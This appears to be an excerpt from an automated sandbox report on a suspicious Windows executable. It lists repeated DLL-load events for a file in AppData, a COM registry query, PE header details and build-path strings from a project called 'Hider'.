Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Section loaded: atiadlxy.dll	Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: zlONcFaXkc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zlONcFaXkc.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: zlONcFaXkc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: zlONcFaXkc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: zcezeaqsuhi.exe, 00000002.00000000.1717795774.000002A5B9702000.00000002.00000001.01000000.00000008.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2015898421.000002A5BB410000.00000002.00000001.00040000.00000008.sdmp, zcezeaqsuhi.exe.1.dr
Source:	Binary string: mscorlib.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
